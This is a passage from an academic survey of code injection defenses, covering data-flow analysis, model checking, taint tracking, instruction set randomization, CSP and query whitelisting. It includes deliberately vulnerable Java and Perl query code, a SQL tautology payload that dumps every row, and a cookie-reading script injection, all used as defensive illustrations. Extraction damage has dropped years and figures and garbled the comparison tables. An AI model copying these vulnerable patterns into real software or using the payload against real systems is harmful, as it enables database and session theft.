injection defect, will include a data-flow path from an input function to a vulnerable operation. for instance, in the following code fragment, user input reaches a method that interacts with a database without any prior validation: mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. 
uname = request.getParameter("username");
String query = null;
if (uname != null) {
    query = "SELECT * FROM table WHERE uname = '" + uname + "'";
    rs = stmt.executeQuery(query);
} else { ... }

as a result, the danger of an sql injection attack is prominent. as it is already clear from the aforementioned example, data-flow analysis is tailored to localize code injection vulnerabilities since it can be applied to associate the unchecked input with the execution of the query and issue a notification. this is why there are numerous adaptations that detect sql injection defects, cross-site scripting vulnerabilities, buffer overflows and others. in addition, most of the creators of such frameworks claim that, with minor changes, their prototypes can be equally applied to also detect other kinds of such defects. contrary to lexical analysis, to counter such anomalies a data-flow analysis mechanism needs more than a vulnerability library that connects coding constructs with software defects. furthermore, a rule-pack containing specific control flow rules and ad-hoc checkers that run upon the cfg are required. the most common rules used in this method are the source, the pass-through and the sink rules (chess & west, ). a source rule denotes the starting point of a possible hazard while a sink rule depicts the coding construct where the hazard takes place. in the aforementioned example, a source rule will apply for the first line, where input can come from a malicious user. the sink rule, on the other hand, will refer to the fifth line, where attacker-controlled data can reach the database. the pass rule indicates the code that exists between the above two and carries the possibly corrupted data. for the most part, these rules are maintained in external files that use a specific format to describe them. livshits & lam ( ) based their work on the functionality presented above to detect possible sql and javascript injection defects in java applications. nagy & mancoridis ( ) have proposed a number of checkers that locate buffer overflow and format string defects. the idea behind their proposal is to mark all the user-input-related parts of the source code. these checkers are implemented as plug-ins to the codesurfer (http://www.grammatech.com/research/technologies/codesurfer) tool (anderson & zarins, ), a commercial tool that performs data-flow analysis on c/c++ programs. another two indicative tools used to detect injection anomalies are pixy (jovanovic, kruegel & kirda, ) and xssdetect (https://blogs.msdn.microsoft.com/ace_team/ / / /xssdetect-public-beta-now-available/). both of these tools detect cross-site scripting vulnerabilities in web applications. the latter, released by microsoft, runs as a visual studio plug-in and analyzes .net il (intermediate language), which is read directly from the compiled binaries. pixy, on the other hand, is a standalone open source tool that examines php scripts. in many cases, rules can appear directly in the code of the program in the form of annotations.
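to illustrate how source, sink and pass-through rules cooperate, the deliberately simplified sketch below runs them over a straight-line, three-address version of the java fragment above. real tools operate on a control-flow graph and are flow- and context-sensitive; the rule names and the toy program representation here are illustrative only.

SOURCES = {"request.getParameter"}     # where untrusted data enters
SINKS = {"stmt.executeQuery"}          # where it must not arrive unchecked
SANITIZERS = {"validate"}              # operations that clear taint

def find_tainted_sinks(program):
    """program: list of (target, operation, arguments) statements."""
    tainted, findings = set(), []
    for lineno, (target, op, args) in enumerate(program, 1):
        if op in SOURCES:
            tainted.add(target)                    # source rule
        elif op in SANITIZERS:
            tainted.discard(target)                # sanitized value
        elif op in SINKS:
            if tainted & set(args):                # sink rule
                findings.append((lineno, op, args))
        elif any(a in tainted for a in args):      # pass-through rule
            tainted.add(target)
    return findings

program = [
    ("uname", "request.getParameter", ['"username"']),
    ("query", "concat", ['"SELECT ..."', "uname"]),
    ("rs", "stmt.executeQuery", ["query"]),
]
print(find_tainted_sinks(program))   # [(3, 'stmt.executeQuery', ['query'])]

the reported finding corresponds exactly to the source-to-sink path described in the text: untrusted input flows through the concatenation into the query execution without a sanitizing step in between.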
/ https://peerj.com http://www.grammatech.com/research/technologies/codesurfer https://blogs.msdn.microsoft.com/ace_team/ / / /xssdetect-public-beta-now-available/ https://blogs.msdn.microsoft.com/ace_team/ / / /xssdetect-public-beta-now-available/ http://dx.doi.org/ . /peerj-cs. a tool that considers control flow graphs and uses annotations at the same time to find buffer overflows and memory leaks is splint (evans & larochelle, ). findbugs (ayewah & pugh, ; hovemeyer & pugh, ; spacco, hovemeyer & pugh, ) is also a static analyzer based on data-flow analysis. dahse & holz ( ) have proposed a refined type of data-flow analysis to detect second-order vulnerabilities. notably, such vulnerabilities occur when an attack payload is first stored by the application on the web server and then later on used in a security-critical operation. as a more sophisticated approach than lexical analysis, data-flow analysis exhibits fewer false positives and negatives than the former. for example, many buffer overflows are not exploitable because the attacker cannot handle the data that overflows the buffer. by using this method, an auditor can in fact distinguish exploitable from non-exploitable buffer overflows. the advantage of data flow static analysis is that it can identify vulnerabilities that could actually occur when real application paths are exercised and not just dangerous coding constructs. model checking model checking is a formal verification approach developed based on graph theory and finite state automata (clarke, emerson & sifakis, ; merz, ). a software model checking framework accepts a system’s source or binary code as input and checks automatically if it satisfies specific properties. first, the framework analyzes statically the code to extract a high-level representation of the system, namely a model. this model usually corresponds to a control-flow graph or a pushdown automaton (beyer et al., ; chen & wagner, ). the properties are often expressed either as assertions, as formulas of temporal logic, or as finite state automata (pnueli, ; miller, donaldson & calder, ). by traversing every execution path of the model, the framework determines whether certain states represent a violation of the provided properties. there is a great number of dangerous programming practices that can be accurately modeled with equivalent security properties. for example, the chroot system call should be followed by a call to chdir ("/"). otherwise, the current working directory could be outside the isolated hierarchy and provide access to a malicious user via relative paths. with a high-level representation of the system at hand and by using ad-hoc algorithms (reps, horwitz & sagiv, ), properties like the above can be easily checked. likewise, it is possible to state the detection of code injection defects as a reachability problem (tsitovich, ). there are many tools based on model checking to detect software vulnerabilities. classic tools include spin (holzmann, ), smv (mcmillan, ) and mops (chen & wagner, ; schwarz et al., ). these tools are representative of the approach but they do not support the detection of cia defects. qed is a model checking system that accepts as input web application written in the standard java servlet specification (https://jcp.org/aboutjava/communityprocess/final/jsr /) and examine them for various code injection vulnerabilities (martin & lam, ). 
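the chroot/chdir rule mentioned above can be phrased as a tiny property automaton that is checked against the execution paths of the extracted model. the sketch below runs such an automaton over one concrete call trace; the trace format is hypothetical, and real model checkers explore the whole state space (often symbolically) rather than a single path.

def check_chroot_property(trace):
    """trace: list of (call, argument) pairs from one execution path.
    Returns the index of the first violating call, or None if safe."""
    expecting_chdir_root = False
    for i, (call, arg) in enumerate(trace):
        if expecting_chdir_root:
            if call == "chdir" and arg == "/":
                expecting_chdir_root = False   # back to the accepting state
            else:
                return i                        # counterexample found
        if call == "chroot":
            expecting_chdir_root = True         # property is now "armed"
    return len(trace) if expecting_chdir_root else None

good = [("chroot", "/jail"), ("chdir", "/"), ("open", "etc/passwd")]
bad = [("chroot", "/jail"), ("open", "../../etc/passwd")]
print(check_chroot_property(good))   # None
print(check_chroot_property(bad))    # 1

the returned index plays the role of the counterexample a model checker hands back to the developer, which is one of the key usability advantages of the approach discussed below.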
also, fehnker, huuck & rödiger ( ) have proposed a model checking approach to detect binary code injection defects in embedded systems. mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://jcp.org/aboutjava/communityprocess/final/jsr / http://dx.doi.org/ . /peerj-cs. the users of a model checking tool do not need to construct a correctness proof. instead, they just need to enter a description of the circuit or program to be verified and the specification to be checked. still, writing specifications is hard and code reviewers with experience are needed. one of the key features of model checking is that it can either reassure developers that the system is correct or provide them with a counterexample. as a result, together with the discover of a security issue, auditors are provided with a possible solution. a major problem in model checking is the state explosion issue (clarke, emerson & sifakis, ; merz, ). the number of all states of a system with many processes or complicated data structures can be enormous. symbolic execution symbolic execution generalizes testing by using unknown symbolic variables during evaluation (king, ; cadar et al., ). in essence, it provides the means to analyze a program to determine which inputs cause each part of a program to execute. this concept can be easily adapted to detect vulnerabilities that may lead to code injection attacks. to counter sql injection attacks, fu & qian ( ) have proposed safeli. first, safeli analyzes the code to detect code constructs used by the application, to interact with a database. at each location that submits an sql query, an equation is constructed to find out the initial values that could lead to a security breach. the equation is then solved by a hybrid string solver where the solution obtained is used to construct test cases. if a defect is detected, an attack is replayed by the tool to developers. ruse, sarkar & basu ( ) detect sql injection vulnerabilities in a similar manner. in addition, rubyx (chaudhuri & foster, ) follows a similar approach to counter javascript injection attacks in applications written in ruby. s (trinh, chu & jaffar, ) is a symbolic string solver that can be used to detect vulnerabilities that may lead to sql injection and xss attacks. to do so, it makes use of a symbolic representation so that membership in a set defined by a regular expression can be expressed as a string equation. then, there is a constraint-based generation of instances from these expressions so that the number of instances can be limited. saxena et al. ( ) have proposed a framework called kudzu, to detect javascript injection attacks. to achieve this, kudzu explores the application’s execution space by creating test cases. then, like safeli, kudzu uses a solver which is implemented by the authors in order to overcome the complexity of javascript’s string operations. finally, by using data-flow analysis, it identifies possible defects based on specific sink rules (see ‘data-flow analysis’). klee (cadar, dunbar & engler, ) was the first symbolic execution engine introduced to detect software bugs in an efficient manner. such bugs include defects that may lead to binary code injection attacks. in addition, mergepoint (avgerinos et al., ) is a binary-only symbolic execution system for large-scale testing of commodity software. 
notably, it is based on veritesting, an approach that employs the merging of execution paths during static symbolic execution, to reinforce the effects of dynamic symbolic execution. symbolic execution has also been used together either with genetic algorithms to detect javascript injection attacks (avancini & ceccato, ) or with runtime tainting (see 'runtime tainting') to detect sql injection attacks (corin & manzano, ). symbolic execution shares a similar problem with model checking (see 'model checking'). symbolically executing all program paths does not scale with large programs since the number of feasible paths grows exponentially. type system extensions a type system is a collection of rules that assign a property called a type to the various constructs of a program (pierce, ). one of the most typical advantages of static type checking is the discovery of programming errors at compile time. as a result, numerous errors can then be detected immediately, rather than discovered later upon execution. for the most part, type extensions aim to overcome the problems of integrating different programming languages. for instance, the integration of sql with the java programming language is typically realised with the jdbc application library (fisher, ellis & bruce, ). by using it, the programmer has to pass the sql query to the database as a string. through this process, the java compiler is completely unaware of the sql language contained within the java code, paving the way for an sql injection attack (recollect the example of 'data-flow analysis'). type-safe programming interfaces like sql dom (domain object model) (mcclure & krüger, ) and the safe query objects (cook & rai, ) were two of the first attempts to detect sql injection attacks via type extension. both of the above mechanisms act as preprocessors and translate an sql database schema into the host general purpose language. the generated collection of objects is used as an application library for the main application, thus ensuring type safety and syntax checking at compile-time. sqlj (eisenberg & melton, ) is a language extension of java that supports sql. it offers type and syntax checking for both languages at compile-time. sugarj (erdweg, ) provides a method through which languages can be extended with specific syntax, in order to embed dsls. the major contribution of this framework is that it can be easily applied to many host languages; currently it supports java, haskell and prolog. all the aforementioned mechanisms wipe out the relationship between untyped java strings and sql queries, but do not address legacy code. in addition, developers are required to learn a new api to use them. webssari (xie & aiken, ) is used to verify web applications written in php. it is based on denning's lattice model which analyzes the information flow of a program (denning & denning, ) and uses type qualifiers to associate security classes with variables and functions that can lead to sql injection defects. wassermann & su ( ) have proposed an approach that deals with static analysis and coding practices together (wassermann & su, ) to detect sql injection attacks. specifically, they analyze the application's code to locate queries that are considered unsafe. to achieve this, they use context free grammars and language transducers (minamide, ).
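the hazard that these type-safe interfaces address can be illustrated with a minimal sketch; python's sqlite3 module is used here merely as a stand-in for the jdbc situation described above, since both accept queries as untyped strings.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

name = "' OR '1'='1"  # hostile input

# unsafe: the query is assembled as an untyped string, so the language
# implementation cannot tell sql syntax apart from user data.
unsafe = "SELECT secret FROM users WHERE name = '%s'" % name
print(conn.execute(unsafe).fetchall())         # returns every row

# safer: a parameterized query keeps the data outside the sql syntax,
# which is roughly the property that sql dom, safe query objects and
# sqlj aim to enforce at compile time for java.
safe = "SELECT secret FROM users WHERE name = ?"
print(conn.execute(safe, (name,)).fetchall())  # returns no rows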
type extensions are a formal way to wipe out code injection defects, but they have a distinct disadvantage: programmers need to learn new constructs and modify their code in multiple places. dynamic detection dynamic detection involves the development of methods and tools to fortify such applications without actually removing the defects from the application's code. a great number of methods that belong to this category involve some kind of dynamic program analysis (boujarwah, saleh & al-dallal, ). dynamic analysis requires a running system and involves sufficient test inputs to examine the behavior of a system. runtime tainting runtime tainting is based on data-flow analysis (see 'data-flow analysis'). in practice, it enforces security policies by marking untrusted ("tainted") data and tracing its flow through the program. runtime tainting may be viewed as an approximation of the verification of non-interference (von oheimb, ) or the more general concept of secure information flow. since information flow in a system cannot be verified by examining a single execution trace of the system, the results of taint analysis will necessarily reflect approximate information regarding the information flow characteristics of the system to which it is applied. runtime tainting is a feature in some programming languages, such as perl (http://search.cpan.org/~rhandom/taint-runtime- . /lib/taint/runtime.pm) and ruby. the following perl code is vulnerable to sql injection since it does not check the value of the $foo variable, which is instantiated by user input:

#!/usr/bin/perl
my $foo = $cgi->param("foo");
...
$dbh->{TaintIn} = 1;
$dbh->execute("SELECT * FROM users WHERE name = '$foo';");

if taint mode is turned on, perl would refuse to run the command and exit with an error message, because a tainted variable is being used in a query. sigfree (wang et al., ) is a mechanism that follows this method to counter buffer overflow attacks by detecting the presence of malicious binary code. this is based on the fact that such attacks typically contain executable code while legitimate requests never contain executable code. however, this is not always the case and therefore the mechanism suffers from false alarms. lift (qin et al., ) also counters binary code injection attacks in a similar manner. the system by haldar, chandra & franz ( ) provides runtime tainting for applications written in java, while the work by xu, bhatkar & sekar ( ) covers applications written in c. securifly (martin, livshits & lam, ) is a similar mechanism based on pql (http://pql.sourceforge.net/) (program query language), which is a language for expressing patterns of events on objects. a dynamic checking compiler called wasc (nanda, lam & chiueh, ) includes runtime tainting to prevent javascript injection attacks. to counter similar attacks, php aspis (papagiannis, migliavacca & pietzuch, ) applies partial taint tracking at the language level to augment values with taint meta-data in order to track their origin. vogt et al. ( ) use runtime tainting to prevent javascript injection attacks.
this is done by inspecting the information flow within the browser. when critical information is about to be sent to a third party, the web user decides if this should be allowed or not. stock et al. ( ) have proposed a method that operates on the client-side too. this method uses a taint-enhanced javascript engine that tracks the flow of data controlled by the attacker. to detect an attack, the method uses html and javascript parsers that can identify the generation of malicious code coming from tainted data. runtime tainting has been partially or fully used in other similar approaches (nadji, saxena & song, ; sekar, ; nguyen-tuong et al., ). notably, such approaches may require numerous changes to the compiler or the runtime system. in positive data flow tracking, tagged data is considered to be legitimate. information flow control (ifc) mechanisms employ positive taint tracking to prevent javascript- driven xss attacks on the browser. representative implementations such as jsflow (hedin et al., ), cowl (stefan et al., ) and the framework by bauer et al. ( ) allow programmers to express information flow policies by extending the type system of javascript. then, the policies are checked at runtime by the javascript interpreter through dynamic checks. instruction set randomization another approach that has been previously proposed as a generic methodology to counter code injection attacks is instruction set randomization (isr) (keromytis, ; kc, keromytis & prevelakis, ). the concept behind isr is to create an execution environment that is unique to the running process. this environment is created by using a randomization algorithm. hence, an attack against this system will fail as the attacker cannot guess the key of this algorithm. the main issue with this approach is that it uses a cryptographic key in order to match the execution environment. as a result, security depends on the fact that malicious users cannot discover the secret key. note that, randomization algorithms are also employed in another popular technique that has been extensively used to prevent binary code injection attacks, address space layout randomization (aslr) (shacham et al., ). to do so, aslr randomly arranges the address space positions of critical data areas of a process such as the base of the executable and the positions of the stack and heap. sqlrand (boyd & keromytis, ) is based on isr to detect sql injections in the following manner: initially, it allows developers to create queries using randomized instructions instead of standard sql keywords. the modified sql statements are either reconstructed at runtime using the same key that is inaccessible to the attacker, or the user input is tagged with delimiters that allow an augmented sql grammar to detect the attack. even if sqlrand imposes a low computational overhead, it imposes an infrastructure overhead since it requires the integration of a proxy. in the case of javascript, consider a xor function that encodes all javascript source of a web page on the server-side and then, on the client-side, the web browser decodes the source by applying the same function again. implementations of this approach include: mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. noncespaces (gundy & chen, ) and xjs (athanasopoulos et al., ). 
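the xor variant sketched above can be illustrated in a few lines; the key and the scripts are made up for the example, and a real implementation would operate inside the server's template engine and the browser's script engine.

def xor_transform(data: bytes, key: bytes) -> bytes:
    # applying the same xor keystream twice restores the original bytes
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

key = b"per-process-random-key"                  # unknown to the attacker
legit = b"document.title = 'welcome';"           # script emitted by the server

shipped = xor_transform(legit, key)              # encoded form sent to the client
assert xor_transform(shipped, key) == legit      # browser-side decode succeeds

injected = b"alert(document.cookie);"            # attacker-controlled clear text
assert xor_transform(injected, key) != injected  # decoding turns it into garbage

because the injected script was never encoded with the key, the uniform decoding step mangles it and the script engine rejects it, which is the essence of instruction set randomization.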
smask (johns & beyerlein, ) identifies malicious code by automatically separating user input from legitimate code by using javascript and html keyword masking (in a way similar to sqlrand boyd & keromytis, ). even if isr is theoretically a sound approach for countering code injection, these implementations have flaws. for example, noncespaces does not protect from persistent data injection. xjs does not have such problems and covers a wide variety of javascript injection attacks. policy enforcement policy enforcement is mainly associated with database security (thuraisingham & ford, ; null & wong, ; chlipala, ; son, chaney & thomlinson, ) and operating system strict access controls (winsor, ; hicks et al., ). in such contexts, policies expressed in specific languages (anderson, ), usually limit information dissemination to authorized entities only. currently, policy enforcement is one of the most common approaches to detect javascript injection attacks. in this approach, web developers define security policies on the server-side. then, these policies are enforced either in the user’s browser or on a server-side proxy that intercepts all html responses. all modern browsers include a javascript (js) engine to support the execution of javascript. most js engines employ restrictions like the same origin policy (takesue, ) and a sandbox mechanism (dhawan & ganapathy, ). in particular, scripts run in a sandbox where they can only perform web-related actions and not general-purpose programming tasks (e.g., creating files) (dhawan & ganapathy, ). also, scripts are constrained by the same origin policy. this policy permits scripts running on pages originating from the same site to access each other’s methods and properties with no specific restrictions, but prevents access to most methods and properties across pages on different sites (takesue, ). still, such schemes cannot stop malicious users from injecting scripts into the user’s browser. consider a legitimate web page that does not validate the input posted by its users. by exploiting this vulnerability, an attacker can post data that will inject javascript into a dynamically generated page. thus the attacker can trick a legitimate user into downloading a well-hidden script from this host in order to steal the user’s cookies. this injected script is confined by a sandboxing mechanism and conforms to the same origin policy, but it still violates the security of the browser (de groef et al., ; saiedian & broyle, ). implementations of this approach include mechanisms such as browsershield (reis et al., ) and corescript (yu et al., ). both mechanisms intercept javascript code on a page as it executes and rewrite it in order to check if it is subject to server-provided, vulnerability descriptions. such implementations impose a significant overhead due to the javascript rewriting. dsi (nadji, saxena & song, ), met (erlingsson, livshits & xie, ), and beep (jim, swamy & hicks, ) require source modifications by the web developers in order to introduce their policies. specifically, in met the security policies are specified as javascript functions and they are included at the top of every web page while in beep web developers need to write security hooks for every embedded script of the application. blueprint (louw & venkatakrishnan, ) is a policy enforcement framework mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. that uses parsed trees to detect javascript injection attacks. 
however, to use it developers need to learn and use a new api in order to correctly escape dynamic content. google caja (http://code.google.com/p/google-caja/) is another policy enforcement approach provided by google. it is based on the object-capability security model (mcgraw, ) and it aims to control what embedded third party code can do with user data. a security layer called ‘‘content security policy’’ (csp) (stamm, sterne & markham, ) was first introduced into firefox to detect various types of attacks, including cross- site scripting https://developer.mozilla.org/en/introducing_content_security_policy. currently, it is supported by almost all the available browsers. to eliminate such attacks, web site administrators must specify which domains the browser should treat as valid sources of script and which not. then, the browser will only execute scripts that exist in source files from white-listed domains. notably, autocsp (fazzini, saxena & orso, ) and dedacota (doupé et al., ) are two schemes that are based on csp. apart from javascript injection attacks, policy enforcement has been also used to detect binary code injection attacks. specifically, kiriansky, bruening & amarasinghe ( ) have proposed program shepherding which monitors control flow transfers in order to restrict execution privileges based on code origins and ensure that program sandboxing will not be breached. in a similar manner, control-flow integrity (cfi) (abadi et al., ), follows a predetermined flow graph that serves as a specification of control transfers allowed in the program. then, at runtime, specific checks enforce this specification. adaptations of cfi include control-pointer integrity (cpi) (kuznetsov et al., ) and cryptographically enforced control flow integrity (ccfi) (mashtizadeh et al., ). the former ensures the integrity of all pointers in a program (e.g., function pointers) and as a result prevents different attacks. the latter employs message authentication codes (macs) to protect elements such as return addresses and function pointers. in general, cfi implementations track control edges separately, without taking into account the context of preceding edges. context-sensitive cfi (van der veen et al., ) provides enhanced security by considering the backward and forward edges of the graph too. notably, there is a number of attempts to overcome cfi. for instance, göktas et al. ( ) have indicated that cfi can be bypassed by using return oriented programming (rop) (buchanan et al., ). through rop, attackers can gain control of the call stack to hijack program control flow. to do so, they execute specific machine instruction sequences that are already presented in machine’s memory. whitelisting whitelisting approaches are based on the features of denning’s original intrusion detection framework (denning, ). in the code injection context, a whitelisting mechanism registers all valid benign code statements during a learning phase. this can be done in various ways according to the implementation. then, only those will be accepted, approved or recognized during production. javascript injection whitelisting approaches generate and store valid javascript code in various forms, and detect attacks as outliers from the set of valid code statements. swap (wurzinger et al., ) registers all the benign scripts that exist in the original application mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. 
and stores an identifier for every benign script. then, a javascript detection component placed in a proxy searches for malicious scripts in the server's responses. if no malicious scripts are detected, the proxy forwards the response to the client-side. note that this approach is inflexible since it does not support dynamic scripts. similar limitations exist in xss-guard (bisht & venkatakrishnan, ), which maps benign scripts to http responses. to support dynamic scripts during the creation of the legitimate identifiers, the authors of xssds (johns, engelmann & posegga, ) substitute string-tokens with specified identifiers. in the case of dsl-driven injection attacks, the various countermeasures follow a similar pattern. didafit (lee, low & wong, ) detects sql injection attacks by registering all benign database transactions. subsequent improvements by valeur, mutz & vigna ( ) tagged each benign transaction with the corresponding web application. to do so, they have extended their anomaly detection framework called libanomaly (http://seclab.cs.ucsb.edu/academic/projects/projects/libanomaly/). furthermore, amnesia (halfond & orso, b; halfond & orso, ) is a tool that detects sql injection attacks by associating a query model with the location of every query in the web application. then, in production mode, it monitors the execution of the application to examine when queries diverge from the expected model. sqlguard (buehrer, weide & sivilotti, ) is another mechanism that detects sql injection attacks based on parse tree validation. in particular, the mechanism compares the parse tree of the query before the inclusion of user input with the one resulting after the inclusion of user input. if the trees diverge, the application is probably under attack. diglossia (son, mckinley & shmatikov, ) also uses parse trees to detect code injection attacks. the main idea behind diglossia is based on the theory introduced by ray and ligatti (ray & ligatti, ). apart from sql injection attacks, it can also be used to detect another emerging type of attack: nosql (chodorow & dirolf, ) injection attacks (see also 'emerging challenges'). sdriver (mitropoulos & spinellis, ; mitropoulos, karakoidas & spinellis, ; mitropoulos et al., ) is a mechanism that prevents sql and xpath injection attacks against web applications by using location-specific signatures. the signatures are generated during a learning phase, and are based on elements that can depend either on the query or on its execution environment (for example the stack trace). then, during production, the mechanism checks all queries for compliance and can block queries containing injected elements. by associating a stack trace with the origin of a query, the mechanism can correlate sql statements with their call sites. this increases the specificity of the stored signatures and avoids false alarms. nsign (mitropoulos et al., ) and sicilian (soni, budianto & saxena, ) follow the same approach as sdriver to prevent xss attacks on the client-side. to do so, nsign includes script origins and the type of a script as environment elements, and javascript keywords and their number of appearances as elements coming from the code that is about to be executed. sicilian, on the other hand, includes more elements from the script (class names, variable names and more) and less from the environment.
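the learning/production split that sdriver, nsign and sicilian rely on can be sketched as follows; the skeleton extraction and the use of a single stack frame as the call site are deliberate simplifications of what the actual mechanisms record.

import hashlib
import re
import traceback

allowed = set()

def signature(query: str) -> str:
    # strip string literals and numbers so only the sql skeleton remains,
    # then bind the skeleton to the call site taken from the stack trace.
    skeleton = re.sub(r"('[^']*'|\d+)", "?", query)
    site = traceback.extract_stack()[-3]        # the application call site
    origin = f"{site.filename}:{site.lineno}"
    return hashlib.sha256(f"{origin}|{skeleton}".encode()).hexdigest()

def learn(query: str) -> None:
    allowed.add(signature(query))               # learning phase: register benign queries

def execute(query: str) -> None:
    if signature(query) not in allowed:         # production: block unseen query shapes
        raise RuntimeError("possible injection blocked")
    # otherwise hand the query to the real database driver

an injected clause such as ' or '1'='1 changes the skeleton of the query, so its signature no longer matches the one registered for that call site and the query is rejected.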
laranjeiro et al. (laranjeiro, vieira & madeira, ; antunes et al., ; laranjeiro, vieira & madeira, ) have proposed a similar mechanism to detect both sql and xpath injection attacks in web services. when it is not possible to run a complete learning phase, a set of heuristics is used by the mechanism to accept or discard doubtful cases. finally, mattos, santin & malucelli ( ) developed a signature-based attack detection engine that utilizes ontologies to counter xml and xpath injection attacks. using ontologies to model data provides explicit and formal semantic relationships between data and possible attacks. analysis and discussion we have analyzed the mechanisms described earlier based on the requirements mentioned in 'introduction and covered area'. tables and illustrate the comparison summaries of the static and dynamic countermeasures. flexibility flexibility indicates if an approach can be adjusted in order to detect different attack categories. typically, all approaches except for lexical analysis have been used to detect various code defects. as we described earlier, lexical analysis is a simplistic approach that cannot be used to identify source code-driven injection attacks. even if a corresponding tool existed, the false alarms would be far too many. this is because source code-driven injection attacks are language independent (see 'introduction and covered area') and lexical analysis can only search for specific keywords or sequences of keywords. as a result, it is only used to detect code constructs that can lead to binary code injection attacks. in all other cases, the approaches are flexible and they can be used to deal with different kinds of attacks. for instance, policy enforcement is a method that seems to be tailored to prevent javascript injection attacks since it involves the interaction of two entities: the client's browser and the server-side application (policies are set on the browser and are enforced on the client-side). notably, it can also be successfully employed to detect binary code injection via cfi mechanisms. effectiveness tests the effectiveness of security mechanisms can be judged by the existence of incorrect data, namely false positives (fp) and false negatives (fn), also known in statistics as type i and type ii errors (peck & devore, ). specifically, a fp is a result that indicates that an attack is taking place, when it has not. a fn occurs when an attack actually takes place, and the mechanism fails to detect it. in tables and , we show if the researchers have performed any tests to evaluate the effectiveness of their proposed mechanisms in terms of fps and fns. if this is the case we put a tick mark ( ); if no tests were performed we put an x mark ( ). we see that there are many cases where no such tests were performed: out of in the case of static analysis and out of in the case of dynamic detection. a reasonable argument for the latter case would be that defenses like jsflow (hedin et al., ) and cowl (stefan et al., ) do not need to be fully validated through testing, because they provide systematic arguments as to why their design is secure. in order for this to stand though, their implementation should closely follow its specification, which may not be the case in practical terms.
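for completeness, the way such counts are usually turned into comparable figures can be sketched as follows; the metric names are standard and are not taken from the surveyed publications.

def effectiveness(tp: int, fp: int, fn: int) -> dict:
    # precision drops as false alarms (fp) grow,
    # recall drops as missed attacks (fn) grow.
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    f1 = 2 * precision * recall / (precision + recall)
    return {"precision": precision, "recall": recall, "f1": f1}

print(effectiveness(tp=90, fp=10, fn=5))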
going one step further, we observed that there were cases such as xss-guard (bisht & venkatakrishnan, ) and the system by valeur, mutz & vigna ( ), where researchers mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table static analysis: comparison summary of tools designed to detect vulnerabilities that can lead to a code injection attack. approach flexibilitya mechanism requirements attack vector effectiveness testsb implementation independencec computational overheadd its (viega et al., ; viega et al., ) (c) ¬ binary code pscan (heffley & meunier, ) (c) ¬ binary code flawfinder (wilander & kamkar, ) (c) ¬ binary code rats (chess & mcgraw, ) ¬ binary code lexical analysis boon (wagner et al., ) (c) ¬ binary code codesurfer (anderson & zarins, ; nagy & mancoridis, ) ¬ binary code splint (evans & larochelle, ) (c) ¬ binary code livshits & lam ( ) (java) ¬ sql, javascript findbugs (ayewah & pugh, ; hovemeyer & pugh, ; spacco, hovemeyer & pugh, ) (java) ¬ sql, javascript pixy (jovanovic, kruegel & kirda, ) ¬ sql, javascript xssdetect ¬ javascript data-flow analysis dahse & holz ( ) ¬ sql, javascript qed (martin & lam, ) (java) ¬ sql, javascript model checking fehnker, huuck & rödiger ( ) (c) ¬ binary code safeli (fu & qian, ) ¬ sql klee (cadar, dunbar & engler, ) (c) ¬ binary code kudzu [ ] ¬ javascript rubyx (chaudhuri & foster, ) (ruby) ¬ javascript mergepoint (avgerinos et al., ) (c) ¬ binary code symbolic execu- tion s (trinh, chu & jaffar, ) ¬ sql, javascript sql dom (mcclure & krüger, ) % sql safe query objects (cook & rai, ) (java) ? sql sqlj (eisenberg & melton, ) (java) ? sql sugarj (erdweg, ; erdweg et al., ) ? sql, xml wassermann & su ( ) sql type system extensions webssari (xie & aiken, ) (php) . % sql notes. aflexibility indicates if the approach can be adjusted in order to detect different categories. beffectiveness tests. this column shows if the researchers performed any tests regarding the effectiveness of their mechanism in terms of false positive and negative results. cimplementation independence indicates if the static analysis mechanism is tailored to a specific programming language. dcomputational overhead. this column shows the runtime overhead that the mechanism may add to the application. in the context of static analysis this can be measured in the case of the type system extension approach. note that the different results does not necessarily indicate that one mechanism is more effective than the other. this is because most of them were evaluated under different assumptions and settings. mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table dynamic detection: comparison summary of mechanisms developed to counter code injection attacks. approach flexibilitya mechanism requirements attack vector effectiveness testsb implementation independencec computational overheadd sigfree (wang et al., ) (c) % binary code lift (qin et al., ) . % binary code haldar, chandra & franz ( ) (java) sql securifly (martin, livshits & lam, ) (java) – % sql, javascript xu, bhatkar & sekar ( ) % sql, javascript wasc (nanda, lam & chiueh, ) % javascript phpaspis (papagiannis, migli- avacca & pietzuch, ) (php) . × sql, javascript, php stock et al. ( ) javascript vogt et al. ( ) ? javascript jsflow (hedin et al., ) ? × javascript cowl (stefan et al., ) % sql, javascript runtime tainting bauer et al. ( ) ? % javascript sqlrand (boyd & keromytis, ) . 
